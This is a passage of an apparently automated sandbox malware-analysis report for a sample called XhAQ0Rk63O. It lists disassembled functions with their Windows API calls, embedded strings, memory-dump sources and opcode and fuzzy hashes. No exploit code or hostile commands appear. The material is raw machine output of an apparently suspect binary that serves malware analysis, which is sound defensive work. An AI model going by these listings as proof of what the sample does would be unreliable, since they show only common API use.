                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                          • String ID:
                                                                                          • API String ID: 2632138820-0
                                                                                          • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                          • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                          • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                          • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                          Function 00433BAC Relevance: 22.6, APIs: 15, Instructions: 79COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                          • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CursorLoad
                                                                                          • String ID:
                                                                                          • API String ID: 3238433803-0
                                                                                          • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                          • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                          • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                          • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                          Function 00460ABB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                          • _wcslen.LIBCMT ref: 00460B00
                                                                                          • __swprintf.LIBCMT ref: 00460B9E
                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                          • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                          • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                          • GetParent.USER32(?), ref: 00460D40
                                                                                          • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                          • String ID: %s%u
                                                                                          • API String ID: 1899580136-679674701
                                                                                          • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                          • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                                          • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                          • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                                          Function 0047D5F6 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 210COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                          • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                                          • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                                          • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                          • API String ID: 2485709727-934586222
                                                                                          • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                          • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                          • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                          • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                          Function 0045DB3E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 181COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                          • String ID: HH
                                                                                          • API String ID: 3381189665-2761332787
                                                                                          • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                          • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                          • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                          • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                          Function 00434506 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 00434585
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                          • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                          • String ID: (
                                                                                          • API String ID: 3300687185-3887548279
                                                                                          • Opcode ID: 440148b18d84eb95ba181de3259d53385060cfec68f9b8a73670629712acb2fa
                                                                                          • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                          • Opcode Fuzzy Hash: 440148b18d84eb95ba181de3259d53385060cfec68f9b8a73670629712acb2fa
                                                                                          • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                          Function 0045E41B Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 150COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                          • __swprintf.LIBCMT ref: 0045E4D9
                                                                                          • _printf.LIBCMT ref: 0045E595
                                                                                          • _printf.LIBCMT ref: 0045E5B7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadString_printf$__swprintf_wcslen
                                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                          • API String ID: 3590180749-2894483878
                                                                                          • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                          • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                          • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                          • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                          Function 0046F90E Relevance: 21.1, APIs: 14, Instructions: 147windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                          • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                          • DeleteObject.GDI32(?), ref: 0046F950
                                                                                          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                          • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                          • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                          • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                          • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                          • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                          • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3412594756-0
                                                                                          • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                          • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                          • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                          • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                          Function 0045D971 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 140COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                            • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                          • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                          • API String ID: 4013263488-4113822522
                                                                                          • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                          • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                          • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                          • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                          Function 00435A35 Relevance: 21.1, APIs: 14, Instructions: 136timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                                          • String ID:
                                                                                          • API String ID: 228034949-0
                                                                                          • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                          • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                                          • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                          • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                                          Function 004334CA Relevance: 21.1, APIs: 14, Instructions: 132filecommemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                          • DeleteObject.GDI32(?), ref: 00433603
                                                                                          • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 3969911579-0
                                                                                          • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                          • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                          • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                          • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                          Function 00445A77 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 73windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetParent.USER32 ref: 00445A8D
                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                          • __wcsicoll.LIBCMT ref: 00445AC4
                                                                                          • __wcsicoll.LIBCMT ref: 00445AE0
                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                          • API String ID: 3125838495-3381328864
                                                                                          • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                          • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                          • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                          • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                          Function 00479921 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 314COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyVariant$ErrorLast
                                                                                          • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                          • API String ID: 2286883814-4206948668
                                                                                          • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                          • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                          • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                          • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                          Function 00475D8B Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 194COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                            • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                          • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                          • _wcscpy.LIBCMT ref: 00475F18
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
